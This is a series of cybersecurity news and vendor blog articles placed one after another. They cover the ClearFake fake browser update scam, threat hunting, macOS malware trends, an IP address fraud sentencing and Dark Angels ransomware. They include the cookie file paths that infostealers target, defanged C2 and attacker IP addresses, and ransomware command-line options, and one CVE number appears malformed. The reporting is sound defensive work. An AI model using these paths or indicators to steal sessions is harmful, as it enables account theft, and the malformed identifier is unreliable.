The Fake Browser Update Scam Gets a Makeover

One of the oldest malware tricks in the book — hacked websites claiming visitors need to update their Web browser before they can view any content — has roared back to life in the past few months. New research shows the attackers behind one such scheme have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement: By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain.

an image of a warning that the Chrome browser needs to be updated, showing several devices (phone, monitor, etc.) open to Google and an enticing blue button to click in the middle.

In August 2023, security researcher Randy McEoin blogged about a scam he dubbed ClearFake, which uses hacked WordPress sites to serve visitors with a page that claims you need to update your browser before you can view the content.

The fake browser alerts are specific to the browser you’re using, so if you’re surfing the Web with Chrome, for example, you’ll get a Chrome update prompt. Those who are fooled into clicking the update button will have a malicious file dropped on their system that tries to install an information stealing trojan.

Earlier this month, researchers at the Tel Aviv-based security firm Guardio said they tracked an updated version of the ClearFake scam that included an important evolution. Previously, the group had stored its malicious update files on Cloudflare, Guardio said.

But when Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and “smart contracts,” or coded agreements that execute actions automatically when certain conditions are met.

Nati Tal, head of security at Guardio Labs, the research unit at Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract’s functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

“These contracts offer innovative ways to build applications and processes,” Tal wrote along with his Guardio colleague Oleg Zaytsev. “Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted ‘on-chain’ without the ability for a takedown.”

Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact.

“So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces,” Tal said.

Attacker-controlled BSC addresses — from funding, contract creation, and ongoing code updates. Image: Guardio

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts.

“This model is designed to proactively identify and mitigate potential threats before they can cause harm,” BNB Smart Chain wrote. “The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible.”

Guardio says the crooks behind the BSC malware scheme are using the same malicious code as the attackers that McEoin wrote about in August, and are likely the same group. But a report published today by email security firm Proofpoint says the company is currently tracking at least four distinct threat actor groups that use fake browser updates to distribute malware.

Proofpoint notes that the core group behind the fake browser update scheme has been using this technique to spread malware for the past five years, primarily because the approach still works well.

“Fake browser update lures are effective because threat actors are using an end-user’s security training against them,” Proofpoint’s Dusty Miller wrote. “In security awareness training, users are told to only accept updates or click on links from known and trusted sites, or individuals, and to verify sites are legitimate. The fake browser updates abuse this training because they compromise trusted sites and use JavaScript requests to quietly make checks in the background and overwrite the existing website with a browser update lure. To an end user, it still appears to be the same website they were intending to visit and is now asking them to update their browser.”

More than a decade ago, this site published Krebs’s Three Rules for Online Safety, of which Rule #1 was, “If you didn’t go looking for it, don’t install it.” It’s nice to know that this technology-agnostic approach to online safety remains just as relevant today.

A Modern Approach to Adaptive Threat Hunting Methodologies

Threat hunting encompasses a range of techniques and approaches aimed at discovering anomalies, threats, and risks associated with attacker activities. In the early days, log review by diligent system administrators was how these anomalies were detected, usually after the fact. This evolved into more structured methodologies created by security experts that attempted to identify these activities in real time. In present day security operations, threat hunting initiatives have become a standard part of mature security programs, but few organizations have managed to establish the expertise and methodology to conduct these types of hunts with internal resources.

In this series, we will take a look at the components that make up well-known threat hunting methodologies, the evolution that reflects the growing need to proactively seek out and mitigate security threats rather than solely relying on reactive, manual measures, and some new adaptive approaches to conducting automated, wide ranging hunt capabilities.

Threat hunting, after all, involves implementing innovative methods of continuous monitoring and analysis of real-world activities to uncover hidden threats, making it an essential aspect of modern cybersecurity that should leverage every aspect of process, technology, and people available to defenders.

Traditional Methodologies

The approach advocated by threat hunting pioneers in the last decade emphasizes proactive cybersecurity practices. It involves the systematic and continuous search for hidden threats and anomalies within an organization’s environment, aiming to detect and mitigate potential breaches before they can cause damage.

In most cybersecurity practices, a robust approach involves utilizing a range of advanced tools. These tools encompass intrusion detection systems (IDS), Security Information and Event Management (SIEM) platforms, Endpoint Protection, Detection, & Response platforms (EPP/EDR), as well as threat intelligence feeds and security service providers. However, the effective application of these tools and services requires the expertise of seasoned cybersecurity professionals and highly tuned, effective tooling.

Experience allows security teams to leverage their knowledge, intuition, and subject matter expertise to interpret data and discern nuanced threats within logs, packets, flows, and trace activities. Some key elements found in traditional methodologies which deliver acceptable results but need to be constantly revisited and enhanced include:

  • Structured Methodology: important for identifying anomalies and potential threats in network traffic, endpoint telemetry, and system logs.
  • Continuous Monitoring: Real-time monitoring of network and system activities to detect suspicious or unusual behavior (security monitoring).
  • Hypothesis-Driven Analysis: Develop hypotheses about potential threats based on known attack patterns, trends, or indicators, then investigate these hypotheses to confirm or refute their suspicions (threat modeling).
  • Data Analysis: Scrutinizing large volumes of data, including network traffic logs, system logs, security controls’ logs, and other relevant data sources, to uncover indicators of compromise (analysis at scale).
  • Configuration analysis: Hunting for misconfigured devices, including incorrect policies, overreaching access, endpoints without installed security controls, etc. (system hardening).
  • Internal hunting: Identifying sensitive data, misconfigurations, plain text passwords, tokens stored or passed inappropriately, unauthorized access to critical systems, and abuse of user identities and service accounts (insider and environmental threats).
  • External hunting: Focused on identifying instances of data, credentials leaks  and/or malware/hacking discovery using third party services such as VirusTotal, Shodan, Dark Web searches, and external surface scanning (external threat).

A crucial aspect of being successful in cybersecurity is the team’s adaptability to the ever-evolving threat landscapes. Security teams must consistently refine their methodologies and remain updated on emerging threats and evolving attack techniques.

Equally important is fostering collaboration among various security teams, including network security, incident response, SOC/SOAR, vulnerability management, and threat intelligence teams. By sharing insights and findings, these teams collectively enhance their ability to protect against cyber threats effectively.

With the scale and speed at which attackers evolve today, defenders can no longer rely strictly on human intuition, manual horsepower, and traditional methodologies.

On the Hunt | SolarWinds SERV-U Vulnerability

Thanks to our WatchTower threat hunting team we can see an example of valuable threat hunting based on traditional methodologies when we take a look at the timeline and story of how exploiting the SolarWinds SERV-U Vulnerability was proven to be connected to the download, decryption, and execution of Cobalt Strike. This proves that a structured methodology supported with data analysis at scale and focused threat hunting can be successful in identifying exploitation of known vulnerabilities with traditional attack methods.

  1. In July 2021, SolarWinds released an advisory on Serv-U version 15.2.3. Microsoft stated that this CVE was used in limited, targeted attacks. After just a few days CISA also released an advisory that this vulnerability may allow a remote attacker to take control of an infected system even though it had not been identified performing such activities in the wild.

  2. Using Deep Visibility queries and Vigilance MDR analyst investigation, the SentinelOne WatchTower threat hunting team spotted abuse of the Solarwinds Serv-U vulnerability in an educational institution exhibiting anomalous behaviors such as spawning unusual child processes.
  3. The vulnerable Serv-U secure FTP launched the command prompt and powershell interface to connect to a remote C2 IP of http://179[.]60[.]150[.]32/login. The C2 IP address was live and served the next level of encoded commands as of August 26, to further decrypt and execute Cobalt Strike in memory.
  4. The SentinelOne Agent successfully blocked and mitigated this attack before it could infect the target machine. Afterwards, it kicked off remediation and patching activities that likely should have been performed before the vulnerability was ever exploited.
  5. The idea is that a modern futuristic paradigm to threat hunting should get ahead of these types of threats and show attempts before they are able to get even this far.

Modern Futuristic Paradigm

The vision of a modern and futuristic threat hunting paradigm involves leveraging advanced technologies and methodologies to enhance security operations and stay ahead of cyber threats. In this paradigm, threat hunting becomes a central focus of Security Operations Centers (SOCs) augmented by service providers and threat experts. Internal and external teams continually conduct research on known and emerging threats, vulnerabilities, and attack techniques for attribution and correlation. This research is then operationalized to proactively identify potential threats and vulnerabilities within an organization’s environment.

Automation plays a pivotal role in this vision. Routine and repetitive tasks are automated to free up security analysts’ time for more strategic activities. Automation can include the automatic collection and analysis of threat intelligence, the correlation of security events, extraction of indicators of compromise (IoCs), and the orchestration of incident response workflows.

Adapting to Changing Security Threats

Adaptive threat hunting is a dynamic approach to proactive anomaly discovery that evolves alongside the ever-changing threat landscape. It recognizes that threats can emerge from various sources, and it goes beyond traditional threat hunting by incorporating offensive inputs, novel research, and a range of hunting strategies.

Threat hunting should include new and real time strategies that address emerging threats in the present; Retroactive hunts, which delve into historical data for hidden threats; Artifact-based searches, which examine digital traces left by attackers; and performing Hunts of Hunts, which involves identification of the overarching strategies and tactics employed by adversaries based on chained detections, with a multi-directional approach for threat attribution.

By embracing these adaptable methods, organizations can strengthen their security postures and better protect against a diverse array of threats. Over this series of blogs we will introduce a modern approach and futuristic paradigm to threat hunting that allows us to stay ahead of the adversary and explore previous hunts analyzing the factors that made them successful. Key aspects of this vision include:

  • Multi-directional Approach: Variety of techniques, data sources, and methodologies to comprehensively understand an organization’s security posture leveraging diverse telemetry, sweeps and scans, and LFO (Low Frequency of Occurrence) statistical analysis you can identify patterns in seemingly unrelated data.
  • Chained Detections: Involves a sequence of automated tasks triggered by an initial detection to triage and enrich telemetry data progressively from disparate data sources. This approach is a proactive and sophisticated way to uncover and respond to complex threats and threat actors.
  • AI and Machine Learning: Artificial Intelligence (AI) and Machine Learning (ML) methods and techniques are integrated into threat hunting processes. These technologies can analyze vast amounts of data, identify anomalies, and detect subtle patterns indicative of potential threats. Machine learning can identify potential threats in reams of seemingly innocuous data by autonomously formulating patterns that lead to malicious behavior, based on statistical event mapping.Generative AI threat hunting can also help security teams detect and respond to threats faster and more accurately.
  • Threat Intelligence Integration: Threat hunting teams integrate internal and external intelligence feeds into their platforms. Threat intelligence platforms and Information Sharing and Analysis Centers (ISACs) facilitate the exchange of threat data and insights, enabling organizations to benefit from collective knowledge. This includes information on known threats, indicators of compromise (IoCs), and emerging attack tactics.
  • Adaptive Continuous Hunting: The security posture is adaptive and responsive. Threat hunting is not a one-time event but an ongoing, adaptive process. Security controls, policies, and threat hunting strategies are continuously adjusted based on evolving threats and the organization’s risk profile.
  • Incident Response Orchestration: Automated incident response orchestration and playbooks (such as those configurable in a SOAR or XDR platform) are used to streamline and accelerate response efforts. Security teams can respond to threats more effectively and consistently with predefined workflows.

A Modern Approach to Hunting

In this modern paradigm, the SOC’s role expands beyond reactive incident response to include proactive research, automated processes, and advanced technologies. There have been many attempts to tackle this problem, including Risk Based Alerting, clustering, baselining, allowlisting/denylisting, data normalization, tokenization, and additional data enrichment strategies, but there are more highly effective methods that we will continue to describe over the next few blog posts.

The goal is to create a resilient security posture capable of defending against a constantly evolving threat landscape with minimal impact on internal resources and security operations.

Akira Ransomware Campaign Highlights

Now we will show the results of a more extensive and modern hunt that yielded threat attribution and a higher level of fidelity and accuracy in identifying the risk and threat actors involved in an attack highlighting the Akira Ransomware Campaign. This was identified by our Vigilance DFIR team working closely with our WatchTower threat hunting team.

Akira ransomware operations were first observed in early 2023, with all the features and assets we expect from modern ransomware familles. This included a victim blog site, multi-platform payloads, and even a retro style branding. Once access is achieved, Akira focuses on stealing confidential documents, destroying backups, disabling security settings, and performing other nefarious activities leading to the extortion of the victim for a handsome ransom.

The following steps lay out the effectiveness of a multi-directional approach that is adaptive and leverages different sources of data intelligence to paint a full picture of a threat actor.

  1. During an Akira incident we identified the group was downloading RustDesk, a remote access and remote control software available for different platforms. Notably, Akira had previously been associated with AnyDesk for persistence and C2 tasks, not the RustDesk RMM tool. It then proceeds to create services, disable the firewall, and allow remote connections from Akira operators.
  1. Internal recon leveraged Advanced IP Scanner and NETSCAN.EXE for mapping the network along with winscp for data exfiltration. They proceeded to access and manipulate SQL databases for the purpose of mapping users, data, and environment.
  1. The threat actor even went so far as to disable LSA (Local Security Authority) settings which help defend Windows users against credential theft by preventing untrusted code from being injected into the LSASS.exe process and disabling protections built into Windows.
  1. While cross-referencing Akira victim blog data with Shodan data it looked like CISCO VPN gateways that belonged to targeted victim organizations were also listed. This suggests that Akira ransomware operators may be exploiting a vulnerability in Cisco VPN software to gain initial access. There is also evidence that stolen credentials acquired via IABs (Initial Access Brokers).
  1. Detecting and blocking this ransomware at the endpoint is the last line of defense. Once a detection is made, that should then turn into actionable intelligence that leads to other investigative directions that help us anticipate attackers’ next steps.

In this case, new tactics and techniques were identified and attributed to a threat actor based on adaptive, continuous threat hunting and external threat analysis. Researching, analyzing, understanding, and hunting for this attack chain enabled our hunters to proactively hunt for similar activity and block it before it became a true threat. Subsequent hunts in other organizations allowed us to detect early and prevent many breaches.

Conclusion

The importance of creating business value through threat hunting in today’s complex and rapidly evolving cybersecurity landscape cannot be overstated. With the proliferation of AI, Cloud, SaaS, IoT, containers, growing market share of macOS, and omnipresent mobile devices, along with the challenges posed by regulated markets and remote work environments, organizations are facing a detection world that has become incredibly intricate. In response to these complexities, it makes strategic sense for many organizations to outsource advanced threat hunting and analysis to specialized security vendors to augment their own capabilities.

The reasons for this shift towards outsourcing this function to expert threat hunters as opposed to having a dedicated threat hunting team are compelling. Detection engineering has matured, and organizations are recognizing that a ‘build’ mentality often leads to playing catch-up with emerging threats. By ‘buying’ the expertise of a security vendor, organizations can leverage the vendor’s multidisciplinary team, which is exposed to new threats and tactics on a daily basis, often well ahead of in-house security teams. This proactive approach reduces the organization’s exposure to risks and accelerates threat response capabilities.

Additionally, the total cost of ownership is significantly lower with a managed service compared to maintaining a salaried internal team with limited expertise. Reliable threat hunting partners provide access to a larger pool of specialized skills as well as access to large data sets of rich telemetry across disparate endpoints and malware tactics. Internal staff can be augmented to enhance the organization’s security posture without the overhead of hiring and training more personnel. The risk of not conducting threat hunting is clear, and even with security tools that offer tremendous quantities of telemetry, it’s essential to have experts process this data to maximize its benefits, predicting the attack instead of just preventing it.

Learn More About WatchTower

For enterprises looking for a threat hunting partner to help them implement a robust methodology to stand up to emergent threats, SentinelOne’s WatchTower provides threat hunting experts equipped with the latest threat intelligence and  AI/machine learning algorithms.

Today, customers can use WatchTower to achieve real-time and retroactive detections of anomalous activity across their enterprise to proactively address evolving threats and strengthen their security posture. Learn more about what WatchTower can do for your enterprise here.

Special thanks to the entire WatchTower, Vigilance, and DFIR teams for contributions in findings, analysis, and content.

Tech CEO Sentenced to 5 Years in IP Address Scheme

Amir Golestan, the 40-year-old CEO of the Charleston, S.C. based technology company Micfo LLC, has been sentenced to five years in prison for wire fraud. Golestan’s sentencing comes nearly two years after he pleaded guilty to using an elaborate network of phony companies to secure more than 735,000 Internet Protocol (IP) addresses from the American Registry for Internet Numbers (ARIN), the nonprofit which oversees IP addresses assigned to entities in the U.S., Canada, and parts of the Caribbean.

Amir Golestan, the former CEO of Micfo.

In 2018, ARIN sued Golestan and Micfo, alleging they had obtained hundreds of thousands of IP addresses under false pretenses. ARIN and Micfo settled that dispute in arbitration, with Micfo returning most of the addresses that it hadn’t already sold.

ARIN’s civil case caught the attention of federal prosecutors in South Carolina, who in May 2019 filed criminal wire fraud charges against Golestan, alleging he’d orchestrated a network of shell companies and fake identities to prevent ARIN from knowing the addresses were all going to the same buyer.

Prosecutors showed that each of those shell companies involved the production of notarized affidavits in the names of people who didn’t exist. As a result, the government was able to charge Golestan with 20 counts of wire fraud — one for each payment made by the phony companies that bought the IP addresses from ARIN.

Golestan initially sought to fight those charges. But on just the second day of his trial in November 2021, Golestan changed his mind and pleaded guilty to 20 counts of wire fraud in connection with the phantom companies he used to secure the IP addresses. Prosecutors estimated those addresses were valued at between $10 million and $14 million.

ARIN says the 5-year sentence handed down by the South Carolina judge “sends an important message of deterrence to other parties contemplating fraudulent schemes to obtain or transfer Internet resources.”

“Those who seek to defraud ARIN (or other Regional Internet Registries) are subject to costly and serious civil litigation, criminal charges, and, ultimately, a lengthy term of incarceration,” reads a statement from ARIN on Golestan’s sentencing.

By 2013, a number of Micfo’s customers had landed on the radar of Spamhaus, a group that many network operators rely upon to stem the tide of junk email. Shortly after Spamhaus started blocking Micfo’s IP address ranges, Micfo shifted gears and began reselling IP addresses mainly to companies marketing “virtual private networking” or VPN services that help customers hide their real IP addresses online.

Golestan did not respond to a request for comment. But in a 2020 interview with KrebsOnSecurity, Golestan claimed that Micfo was at one point responsible for brokering roughly 40 percent of the IP addresses used by the world’s largest VPN providers. Throughout that conversation, Golestan maintained his innocence, even as he explained that the creation of the phony companies was necessary to prevent entities like Spamhaus from interfering with his business going forward.

There are fewer than four billion so-called “Internet Protocol version 4” or IPv4 addresses available for use, but the vast majority of them have already been allocated. The global dearth of available IP addresses has turned them into a commodity wherein each IPv4 address can fetch between $15-$25 on the open market.

This has led to boom times for those engaged in the acquisition and sale of IP address blocks, but it has likewise emboldened those who specialize in absconding with and spamming from dormant IP address blocks without permission from the rightful owners.

The U.S Department of Justice says Golestan will serve 60 months in prison, followed by a 2-year term of court-ordered supervision. The Micfo CEO also was ordered to pay nearly $77,000 in restitution to ARIN for its work in assisting federal prosecutors.

macOS Malware 2023 | A Deep Dive into Emerging Trends and Evolving Techniques

Last week saw Apple update XProtect to version 2173 with new rules for Atomic Stealer and Adload. As we have noted previously, Apple’s defenses for the Mac have been evolving of late, with increased attention on remediation and some prototype behavioral rules that appear to still be in testing mode.

However, 2023 to date has seen new approaches to compromising Macs that continue to leave macOS users at risk if organizations are not taking additional measures to defend against them.

In this post, we look at some of the major macOS malware discovered recently and detail how threat actors are adapting and evolving to ensure successful compromise when targeting Apple’s desktop platform.

Persistence No Longer a Priority for Mac Infostealers

Perhaps one of the most significant changes we’ve seen in 2023 is the multitude of macOS malware families that eschew persistence. This is especially characteristic of infostealers, which aim to achieve all their objectives in one execution – stealing the user’s admin passwords, browsing data, session cookies and keychain, and then exfiltrating these off to a remote server.

With such a haul, the attackers have no need for persistence, as they now have access to any cloud or SaaS accounts that the user had stored credentials and cookies for on their local device.

~/Library/Cookies/*.binarycookies

Chrome:  ~/Library/Application Support/Google/Chrome/Default/Cookies
Firefox: ~/Library/Application Support/Firefox/Profiles/[Profile Name]/
Slack :  ~/Library/Application Support/Slack/Cookies (file) 
	 ~/Library/Application Support/Slack/storage/*
         ~/Library/Containers/com.tinyspeck.slackmacgap/Data/Library/Application Support/Slack/storage

Other recent malware families abjure traditional persistence mechanisms in favor of trojanizing software that they expect the user to run regularly, in effect making the user’s own behavior the means of persistence. A good example of this, as we’ll discuss further below, was the March 2023 compromise of 3CX.

With no need to schedule execution of the malware through system services, detection becomes problematic for certain kinds of security mechanisms, and Apple’s recent introduction of pushing user notifications to warn when background items are scheduled is rendered irrelevant.

Organizations Compromised Through Targeted Social Engineering

Threat actors have begun using more sophisticated social engineering techniques to compromise Mac users. Although much common malware is distributed through channels such as torrent sharing sites and third-party software download sites, threat actors looking to compromise businesses are developing highly targeted campaigns.

Earlier in 2023 we saw how RustBucket malware targeted organizations with specially crafted applications that victims were persuaded into executing as part of an elaborate social engineering scheme. Threat actors engaged victims with the promise of a business deal and shared ‘confidential’ PDF documents that could not be read by ordinary PDF viewer software.

To view the documents ‘securely’, victims were encouraged to download a ‘proprietary’ application named ‘Internal PDF Viewer’. Convinced that the software was required to maintain the secrecy of the deal, users were persuaded to override Apple’s built-in security mechanisms. The malicious PDF viewer displayed the document the victim was expecting to see but in the background downloaded and executed malware from the attacker’s C2.

RustBucket Stage 2 downloads the next stage of the attack via curl
RustBucket Stage 2 downloads the next stage of the attack via curl

Less-sophisticated but still targeted malware has also been spotted this year aiming at small businesses and freelance contractors. The macOS MetaStealer campaign targeted victims with social engineering lures like “Advertising terms of reference” and “Brief_Presentation-Task_Overview”. These files were in fact disk images containing infostealer malware disguised as PDF documents.

As with RustBucket, the aim was to incentivize users to override Apple’s macOS security mechanisms, which unfortunately means little more than convincing them to right-click a file and choose ‘open’ rather than double-clicking it.

Increased Use of Public Offensive Security Tools

Controversy has long swirled around offensive security tools in the Windows world, particularly Cobalt Strike, which has been cracked and leaked so widely that it is now a mainstay of attackers of all stripes. The same trend is now starting to be seen in the macOS malware world, too.

Projects like Geacon wrap Cobalt Strike capabilities in Go-based payloads. These have been seen embedded in fake versions of enterprise level apps like SecureLink beaconing out to C2s in China and using job resumés as decoys.

Highly-regarded open source red teaming tool Mythic and its various payloads, particularly Poseidon, for example, have also been seen in recent macOS malware campaigns.

Poseidon and Mythic function as an implant and C2 administration suite much the same way as Cobalt Strike does. With built in obfuscation and encrypted communications, Poseidon provides attackers with a powerful toolkit.

Offensive security practitioners would argue that the open source nature of the tool makes it possible for security vendors to develop detections for the tool. This is indeed true, and most 3rd party security software should be able to detect Poseidon either statically or behaviorally. However,  Apple does not appear to have taken up that offer as yet; its malware blocking service XProtect does not contain a signature to detect Poseidon payloads.

An obfuscated Poseidon payload - red team or malware?
An obfuscated Poseidon payload – red team or malware?

For defenders, additional security is required. Because of the nature of such tools, it can be difficult to tell when these payloads are spotted in the wild whether they are simply leaked red-teaming tools or genuine malware campaigns, but in either case detection and protection is required.

Living Off the Orchard | Built-in Tools Used for Malicious Acts

LOLBins or ‘Living-Off-the-Land’ techniques have a long history of use in malware and cyber attacks targeting other platforms. On macOS, there is an increasing recognition of such techniques, sometimes described as “living off the orchard”. Resources to help recognize these are becoming increasingly important.

In 2023, perhaps the most commonly used built-in tools are the system_profiler tool for gathering data about the local installation, sw_vers to collect the OS system version and build, and curl both for downloading and exfiltrating data. SentinelLabs has previously documented 20 of the most common macOS LOLBins.

One of the most common malware families seen throughout 2023 and over the last two years or so, Adload uses a combination of LOLBins like chmod, xattr, and ioreg to complete its tasks.

Adload's use of ioreg
Adload’s use of the LOLBin ioreg

Such tools present difficulties for defenders as it makes malicious behavior more difficult to separate from legitimate behavior, precisely the reason why attackers favor using them to achieve their objectives where possible. Of course, context here is everything. Visibility into execution chains and process trees can help threat hunters understand whether such tools are being abused, while advanced EDR tools can automate detection of malicious processes that include use of LOLBins.

Abusing Open Source Software for Initial Compromise

In July 2023, malware dubbed JokerSpy was reported by several vendors though attribution remains uncertain. JokerSpy contained several components, including two python backdoors, red-teaming tool SwiftBelt and a Swift-based Mach-O that attempts to masquerade as Apple’s own XProtect malware checking service.

Analysis of these components suggests that some attacks began the infection through a trojanized QR code generator, QRLog. The malware is hidden inside a genuine QR code generator written in Java via a malicious file, QRCodeWriter.java, inserted into the legitimate project. This file first determined the host OS, then downloaded an appropriate payload that opened a reverse shell allowing the attacker access to the victim’s device.

QRLog malware trojanizes a legitimate QR code generator
QRLog malware trojanizes a legitimate QR code generator

Although it is unclear how the threat actors delivered the trojanized software to targets, JokerSpy was found in several enterprise intrusions, including a large cryptocurrency exchange.

Ensuring that Open Source software is scrutinized against a known bill of materials and that any known vulnerabilities are patched is now part of CISA’s recommendations for all federal agencies, and private organizations are following suit. OSS presents a huge attack surface on all platforms, including macOS, and threat actors will continue to find ways to abuse it to compromise valuable targets.

Protecting Payloads with Multi-Stage, Modular Malware

One of this year’s most complex supply chain attacks, the Smooth Operator campaign, which compromised downstream businesses via maliciously tampering with 3CX’s call routing software client, 3CXDesktopApp, still remains something of a mystery.

In March 2023, various initial and intermediate stages of the malware were discovered for the macOS side of the infection chain. The attackers were careful to drop multiple stages that gathered information about the victim’s environment, but the final stage – we might suspect a backdoor or reverse shell – has yet to come to light.

The known stages of the malware were built for stealth. They relied on users launching the trojanized application for persistence, only collected limited data about the host’s 3CX account, and then self-deleted after sending this information to the attacker. The known payloads do not contain any backdoor capabilities and only collect data that would not seem obviously anomalous for the 3CX application.

Clearly, the attackers went to great lengths to ensure that the resources they put into the final stage malware would not be easily burned. For defenders, this is worrying because one reason for such caution would be protecting a high-value zero-day from being exposed.

In a similar vein, the JumpCloud intrusion in July 2023 also used multiple stages for stealth and to protect late stage payloads. Researchers have attributed both campaigns to DPRK-linked threat actors with a focus on supply chain attacks that will haul in sensitive enterprise information to be used in further, more targeted intrusions. At the same time, it is believed the actors behind these campaigns are developing and sharing a variety of toolsets and that further macOS malware campaigns are inevitable.

SentinelOne Customers Protected

SentinelOne customers are protected from the malware discussed in this article. In addition, the Singularity platform provides unparalleled visibility and threat hunting capabilities to enable security teams to fully investigate and remediate threats on macOS devices.

Conclusion

While Apple continues to work on improving its own attempts to detect malware targeting the macOS platform, updates to XProtect’s YARA rules still lag significantly behind detections provided by third party solutions. For example, the Atomic Stealer rules added this week to XProtect v2173 relate to malware that have been detected in the wild by vendors for several months.

Therefore, it is highly recommended that enterprises supplement the protections offered by Apple with a security solution that uses multiple detection engines to stop both commodity malware and advanced threats.

If you would like to learn more about how SentinelOne can help protect your Mac fleet, contact us for more information or request a free demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 41

The Good | New Resources to Help Fight Ransomware

Extortion and ransomware continue to be the top cyber security concern for many enterprises, not least as we see threat actors pushing into new areas such as targeting ESXi servers and exploiting known vulnerabilities to gain initial access. Good news then that CISA has launched two new resources this week for combating ransomware campaigns.

As part of its wider Ransomware Vulnerability Warning Pilot (RVWP) scheme, the agency has added a “Known to be used in ransomware campaigns” column to its existing Known Exploited Vulnerabilities (KEV) catalog. For example, the recent WS_FTP vulnerability (aka CVE-2023-40044) is now marked in the catalog as ‘Known’ under the new column after reports that threat actors are using multiple attack chains to compromise organizations.

In addition, CISA is maintaining a list of “Misconfigurations and Weaknesses Known to Be Used in Ransomware” on its StopRansomware site. This list provides information on weaknesses and misconfigurations that are commonly exploited by threat actors in ransomware campaigns and, unlike the previously mentioned KEV catalog, contains information not based on CVEs. For each entry, a short description is provided along with the name of the vulnerable service and commonly used ports.

CISA says it hopes the new resources will help guide organizations to quickly identify and mitigate vulnerable software and services that are being actively exploited. Organizations are urged to review the resources regularly as part of their proactive security measures.

The Bad | HTTP/2 Rapid Reset Attack Could Overwhelm Unpatched Servers

While denial of service attacks may be further down the list of immediate threats for some organizations, there’s no doubt that DDoS campaigns can cause serious disruption and revenue loss for targeted organizations. Amazon, Cloudflare and Google have all reported this week that a massive campaign of DDoS attacks has been exploiting a vulnerability in the HTTP/2 protocol stack.

Google says the attacks, which began in August and are ongoing today, included one attempt to overwhelm internet services that was 7.5 times larger than the last previously recorded largest attack, reaching a peak of 398 million requests per second and continuing for two minutes. The service provider says that over two minutes, the attack generated more requests than the total number of article views on Wikipedia for an entire month.

Source: Google

Analysis of the attacks showed that threat actors are using a Rapid Reset technique that leverages the stream multiplexing capabilities of the HTTP/2 protocol. These capabilities enable clients to have multiple in-flight requests open on a single TCP connection. While the number of requests is theoretically limited to 100, by immediately canceling each request and then generating further requests, a malicious client can in effect have an indefinite number of requests in flight. Analysts say that even a modest-sized botnet can leverage this technique to overwhelm targets’ defenses.

Enterprises or individuals serving HTTP workloads to the public internet may be at risk from the attack, and organizations are urged to verify that any vulnerable servers supporting HTTP/2 are patched against CVE-2023-444887. Multiple vendors have released patches for their products this week.

The Ugly | China Suspected in Attacks Exploiting Critical Confluence Bug

A zero-day bug in Atlassian’s Confluence software reported last week to be under active exploitation is this week said to be being used by a nation-state actor linked to China, although details remain sparse.

CVE-2023-22515 is rated 10.0, the maximum possible score, on the CVSS severity rating system. The flaw is a critical privilege escalation vulnerability in Atlassian Confluence Data Center and Server, affecting versions 8.0.0 through 8.5.1, and is exploitable anonymously if the vulnerable server is exposed to the public internet. The bug allows attackers to create a Confluence administrator account within the application.

Warnings last week of active in-the-wild exploitation were followed up this week in a series of tweets from @MSFTSecIntel, claiming that a threat actor tracked variously under the names DarkShadow and Oro0lxy was behind the activity. Several IP addresses were observed sending exploit traffic:

  • 192.69.90[.]31
  • 104.128.89[.]92
  • 23.105.208[.]154
  • 199.193.127[.]231

The threat actor has a history of exploiting unpatched web applications. In 2020, the DoJ indicted two Chinese nationals, Li Xiaoyu (李啸宇) and Dong Jiazhi (董家志) for a long-running campaign spanning 11 countries in which they stole enterprise data from multiple companies, including Covid vaccine manufacturer, Moderna. Oro0lxy is known to be an online alias of Li. It is alleged that both individuals work on behalf of China’s Ministry of State Security. Both are currently wanted by the FBI.

Organizations using the affected versions of Confluence Data Center and Server are urged to update their instances as a matter of urgency and to take appropriate threat hunting measures to determine and mitigate any existing compromise.

Dark Angels | ESXi Ransomware Borrows Code & Victimology From RagnarLocker

In September 2023, automation and manufacturing company Johnson Controls was targeted in a ransomware attack where threat actors used Dark Angels ransomware to lock the company’s VMWare ESXi servers. SentinelOne has analyzed the binary related to this attack and found that it has considerable overlap with RagnarLocker’s ESXi version.

In this post, we present technical details of the Dark Angels ransomware, offer a comparative analysis of Dark Angels and RagnarLocker samples, and provide recommendations for security teams safeguarding ESXi servers.

Overview

RagnarLocker is a ransomware group that was active throughout 2020 to 2022, drawing attention from the United States Federal Bureau of Investigation (FBI) for targeting entities in the critical manufacturing sector.

Dark Angels is a relative newcomer first reported in 2022 for its Windows version, which was very closely linked to the leaked Babuk Windows source code. Interestingly, our analysis finds the ESXi version of Dark Angels shares no significant overlap with the leaked Babuk ESXi locker source code, which many Linux ransomware families are based on or adapted from.

Technical Details

Dark Angels (06187023d399f3f57ca16a3a8fb9bb1bdb721603) is a 64-bit Executable & Linkable Format (ELF) binary designed for Intel-based Linux systems. On execution, the program logs the encryption progress to the hardcoded log file name, wrkman.log, which is saved to the directory that the Dark Angels binary is run from.

The program requires the operator to specify a root directory for file encryption to start, which will then process any subdirectories. Dark Angels takes optional arguments, which are documented internally as dl:m:s:v.

The -m argument lets the operator specify how many encryption threads to run concurrently, which can be 10, 20, 25, 33, or 50. The -v argument enables verbose logging mode to the command line. The -l argument lets the actor specify a log file name for the progress log.

A Dark Angels run with the -v flag logs encryption progress to the console
The -v flag logs encryption progress to the console

During analysis, we observed that Dark Angels wrote a ransom note for each file encrypted; normally, ransomware writes one ransom note per directory where files are processed for encryption. The ransom note naming convention is .crypted.README_TO_RESTORE.

